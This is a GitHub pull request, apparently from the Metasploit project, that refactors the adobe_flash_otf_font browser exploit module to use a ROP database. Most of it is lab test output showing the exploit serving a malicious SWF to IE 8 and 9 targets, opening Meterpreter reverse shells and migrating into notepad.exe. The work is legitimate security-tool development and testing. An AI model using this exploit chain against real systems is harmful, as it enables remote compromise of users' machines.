Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Use RopDb in adobe_flash_otf_font, also cleaner code & output #868

Merged
merged 1 commit into from
Oct 7, 2012
Merged

Use RopDb in adobe_flash_otf_font, also cleaner code & output #868

merged 1 commit into from
Oct 7, 2012

Conversation

wchen-r7
Copy link
Contributor

@wchen-r7 wchen-r7 commented Oct 7, 2012

This pull request has the following changes:

  • More target testing
  • Use of RopDb mixin
  • Cleaner code
  • Cleaner output in msfconsole

Test Results:

Test #1:

msf  exploit(adobe_flash_otf_font) >
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /m7
[*] 10.0.1.6         adobe_flash_otf_font - Sending HTML
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /QknEH.txt.swf
[*] 10.0.1.6         adobe_flash_otf_font - Sending SWF
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /QknEH.txt
[*] 10.0.1.6         adobe_flash_otf_font - Default back to JRE ROP
[*] 10.0.1.6         adobe_flash_otf_font - Sending Payload
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 3 opened (10.0.1.3:4444 -> 10.0.1.6:2469) at 2012-10-06 20:40:41 -0500
[*] Session ID 3 (10.0.1.3:4444 -> 10.0.1.6:2469) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (404)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 784
[+] Successfully migrated to process

Test #2:

msf  exploit(adobe_flash_otf_font) > [*]  Local IP: http://10.0.1.3:8080/49
[*] Server started.
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /49
[*] 10.0.1.6         adobe_flash_otf_font - Sending HTML
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /ikGxF.txt.swf
[*] 10.0.1.6         adobe_flash_otf_font - Sending SWF
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /ikGxF.txt
[*] 10.0.1.6         adobe_flash_otf_font - Using Rop Chain For Flash: 11,3,300,268
[*] 10.0.1.6         adobe_flash_otf_font - Sending Payload
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 4 opened (10.0.1.3:4444 -> 10.0.1.6:1114) at 2012-10-06 20:45:36 -0500
[*] Session ID 4 (10.0.1.3:4444 -> 10.0.1.6:1114) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3104)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3380
[+] Successfully migrated to process

Test #3:

msf  exploit(adobe_flash_otf_font) > [*]  Local IP: http://10.0.1.3:8080/ev
[*] Server started.
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /ev
[*] 10.0.1.6         adobe_flash_otf_font - Sending HTML
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /CzAta.txt.swf
[*] 10.0.1.6         adobe_flash_otf_font - Sending SWF
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /CzAta.txt
[*] 10.0.1.6         adobe_flash_otf_font - Using Rop Chain For Flash: 11,3,300,265
[*] 10.0.1.6         adobe_flash_otf_font - Sending Payload
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 5 opened (10.0.1.3:4444 -> 10.0.1.6:1077) at 2012-10-06 20:49:56 -0500
[*] Session ID 5 (10.0.1.3:4444 -> 10.0.1.6:1077) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3464)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3824
[+] Successfully migrated to process

Test #4:

msf  exploit(adobe_flash_otf_font) >
[*]  Local IP: http://10.0.1.3:8080/Ew
[*] Server started.
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /Ew
[*] 10.0.1.6         adobe_flash_otf_font - Sending HTML
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /oemOE.txt.swf
[*] 10.0.1.6         adobe_flash_otf_font - Sending SWF
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /oemOE.txt
[*] 10.0.1.6         adobe_flash_otf_font - Using Rop Chain For Flash: 11,3,300,257
[*] 10.0.1.6         adobe_flash_otf_font - Sending Payload
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 6 opened (10.0.1.3:4444 -> 10.0.1.6:1260) at 2012-10-06 20:56:03 -0500
[*] Session ID 6 (10.0.1.3:4444 -> 10.0.1.6:1260) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3108)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3420
[+] Successfully migrated to process

Test #5:

msf  exploit(adobe_flash_otf_font) > [*]  Local IP: http://10.0.1.3:8080/gp
[*] Server started.
[*] 10.0.1.7         adobe_flash_otf_font - Target selected: IE 9 on Windows 7 SP1
[*] 10.0.1.7         adobe_flash_otf_font - Client requesting: /gp
[*] 10.0.1.7         adobe_flash_otf_font - Sending HTML
[*] 10.0.1.7         adobe_flash_otf_font - Target selected: IE 9 on Windows 7 SP1
[*] 10.0.1.7         adobe_flash_otf_font - Client requesting: /aABPR.txt.swf
[*] 10.0.1.7         adobe_flash_otf_font - Sending SWF
[*] 10.0.1.7         adobe_flash_otf_font - Target selected: IE 9 on Windows 7 SP1
[*] 10.0.1.7         adobe_flash_otf_font - Client requesting: /aABPR.txt
[*] 10.0.1.7         adobe_flash_otf_font - Default back to JRE ROP
[*] 10.0.1.7         adobe_flash_otf_font - Sending Payload
[*] Sending stage (752128 bytes) to 10.0.1.7
[*] Meterpreter session 7 opened (10.0.1.3:4444 -> 10.0.1.7:49174) at 2012-10-06 21:02:57 -0500
[*] Session ID 7 (10.0.1.3:4444 -> 10.0.1.7:49174) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2752)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3048
[+] Successfully migrated to process

@jvazquez-r7
Copy link
Contributor

Eyeballed and looks good, also retested with Windows XP SP8 ( JRE rop and SWF rop):

msf  exploit(adobe_flash_otf_font) > rexploit
[*] Reloading module...
[*] Exploit running as background job.
[-] Handler failed to bind to 192.168.1.128:4444
[*] Started reverse handler on 0.0.0.0:4444 
[!] URIPATH set to /Oz
[*] Using URL: http://0.0.0.0:8080/Oz
msf  exploit(adobe_flash_otf_font) > [*]  Local IP: http://192.168.1.128:8080/Oz
[*] Server started.
[*] 192.168.1.152 - Meterpreter session 1 closed.  Reason: Died
[*] 192.168.1.152    adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 192.168.1.152    adobe_flash_otf_font - Client requesting: /Oz
[*] 192.168.1.152    adobe_flash_otf_font - Sending HTML
[*] 192.168.1.152    adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 192.168.1.152    adobe_flash_otf_font - Client requesting: /xWZpd.txt.swf
[*] 192.168.1.152    adobe_flash_otf_font - Sending SWF
[*] 192.168.1.152    adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 192.168.1.152    adobe_flash_otf_font - Client requesting: /xWZpd.txt
[*] 192.168.1.152    adobe_flash_otf_font - flash_version 11,2,202,233
[*] 192.168.1.152    adobe_flash_otf_font - Default back to JRE ROP
[*] 192.168.1.152    adobe_flash_otf_font - Sending Payload
[*] Sending stage (752128 bytes) to 192.168.1.152
[*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.152:2111) at 2012-10-07 17:16:28 +0200
[*] Session ID 2 (192.168.1.128:4444 -> 192.168.1.152:2111) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2172)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2628
[+] Successfully migrated to process 
[*] 192.168.1.152 - Meterpreter session 2 closed.  Reason: Died
[*] 192.168.1.152    adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 192.168.1.152    adobe_flash_otf_font - Client requesting: /Oz
[*] 192.168.1.152    adobe_flash_otf_font - Sending HTML
[*] 192.168.1.152    adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 192.168.1.152    adobe_flash_otf_font - Client requesting: /xWZpd.txt.swf
[*] 192.168.1.152    adobe_flash_otf_font - Sending SWF
[*] 192.168.1.152    adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 192.168.1.152    adobe_flash_otf_font - Client requesting: /xWZpd.txt
[*] 192.168.1.152    adobe_flash_otf_font - flash_version 11,3,300,268
[*] 192.168.1.152    adobe_flash_otf_font - Using Rop Chain For Flash: 11,3,300,268
[*] 192.168.1.152    adobe_flash_otf_font - Sending Payload
[*] Sending stage (752128 bytes) to 192.168.1.152
[*] Meterpreter session 3 opened (192.168.1.128:4444 -> 192.168.1.152:1367) at 2012-10-07 17:22:46 +0200
[*] Session ID 3 (192.168.1.128:4444 -> 192.168.1.152:1367) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2632)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3112
[+] Successfully migrated to process

merging!

@jvazquez-r7 jvazquez-r7 merged commit 5b65608 into rapid7:master Oct 7, 2012
@wchen-r7 wchen-r7 deleted the cve_2012_1535_flash_rop_update branch August 22, 2016 16:23
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@wchen-r7 @jvazquez-r7 @sinn3r